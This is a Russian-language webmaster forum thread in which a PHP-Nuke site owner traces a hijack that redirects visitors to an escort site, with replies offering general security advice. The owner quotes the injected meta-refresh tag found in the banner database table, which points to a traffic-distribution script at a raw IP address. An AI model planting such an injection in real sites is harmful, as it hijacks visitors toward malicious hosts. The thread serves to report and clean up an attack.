|
|
|
|
|
|
|
15.07.2007, 23:32
Всем привет!
Взломали сайт - не могу найти проблему.(А первоночально взломали аську. Через некоторое время и сайт.) Nuke 7.9 После захода на главную http://izberg.net.ua/ через несколько сек. в этом окне переключает на сайт досуга http://www.dosug.nu/servlet/ru/kiev/ Обратился к хостеру, он сказал поменять индекс, пароли фтп, БД. Все это зделал, а "воз и ныне там"... Что это может быть? Помогите, если знаете!
Последний раз редактировалось Soniks, 27.07.2007 в 20:35.
|
|
|
|
|
|
|
17.07.2007, 03:01
если аську сломали, значит протроянили.
уперли и фтп.
и залить туда могли что угодно и куда угодно.
проверять все файлы на хосте.
и в первую очередь - свой комп. если троян не удалил, хоть меняй пасы, хоть не меняй.
|
|
|
|
|
|
|
24.07.2007, 22:59
Спасибо большое за ответ Alexander-V-Sh !!! А куда хоть примерно могли вставить, подскажите или какие надписи??????
|
|
|
|
|
|
|
27.07.2007, 11:31
я бы например, полностью перезалил весь сайт или сравнивал даты изменения файлов.
плюс проверил все директории.
а вообще то врядли что то во внутрь залили. поэтому, имхо, достаточно удалить трояна, сделать защиту (чтобы больше не пролез).
а на сайте заменить индекс, майнфайл, ну и тему можно.
думаю этого будет достаточно.
|
|
|
|
|
|
|
30.07.2007, 23:27
Спасибо за ответ, ничего это не помогло, перезалил сайт полностью. Ну, думаю, все велл... Хрена, я вообще очень РАЗОЗЛИЛСЯ, на хостера наехал. Он чуть не закрыл аккаунт. Скачал дамп БД. Проверил по поиску http://81.29.241.195/ Не поверете, нахожу в таблице nuke_banner вот такое, которое вдвое повышало трафик, которое со 100-120 посетителей скатило до 10-20 в день, которое понизило ТИЦ : <meta http-equiv=\"refresh\" content=\"0; url=http://81.29.241.195/tds/go.php?sid=3\"> Только осторожно, эти фтп трояны - доунлоадеры, просто так не кликайте. Это руководство: где таких гадов искать!
|
|
|
|
|
|
|
23.11.2007, 21:59
господа!
не передавайте информацию, относительно паролей, логинов, другой конфедициальной инфы по аське - она взламывается на ура всякими уродами. по аське договаривайтесь, но инфу скидывайте , хотя-бы по мылу.
|
|
|
|
|
|
|
19.01.2008, 22:52
все уже было сказано но я :-) добавлю (реком)
1. никогда (избегать) не пользоватся Ftp (парол) - для слива и т.д. (лючше модуль какойнибуть! :-))
2. сатив вир машину читую и дела все через нее и только по вебу своего сайта- если троя попадет на машину то вероятност то что он попадет на вир.машин почти 0%.
3. создать вир.машин для интернета (не вводить ни каких паролей), ели вирус попадет то нежалко снести ос.
из практического опыта!
ну все.
|
|
|
|
|
|
|
03.02.2009, 12:46
Здравствуйте!
У меня случилось почти то-же самое.
Установил на сайте модуль 4nAlbum. Там есть возможность загружать пользователями фотографии, но для этого нужно на папку temp установить права 777, что я и сделал.
А буквально через пару дней в эту папку залили СПАМ-СКРИПТ, за что мой хостер отключил мой сайт. Кто-нибудь может посоветовать, как обезопасить папки с правами доступа 777 от заливки туда "плохих" файлов?
|
|
|
|
|
|
|
05.02.2009, 02:03
Я бы создал еще 1 папку, а в папке temp текстовый документ, в котором написано куда пересылать файлы, инфу и др. вот тока сам код который должен быть в документе непомню... и с помощью этого все пересылаетсо в созданую папку... ну просто у меня была подобная ситуация, я так сделал и гуд.
|
|
|
|
|
|
|
|
|
|
|
|
"Если бы вам удалось надавать под зад человеку, виноватому в большинстве ваших неприятностей - вы бы неделю не смогли сидеть". |
|
|
|
|
|
|
|
|
Опции темы |
Поиск в этой теме |
|
|
Опции просмотра |
Линейный вид
|
Ваши права в разделе
|
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
HTML код Выкл.
|
|
|
Часовой пояс GMT +4, время: 01:09.
|
|
|
|
|
|
|
|
|
|
|
|
|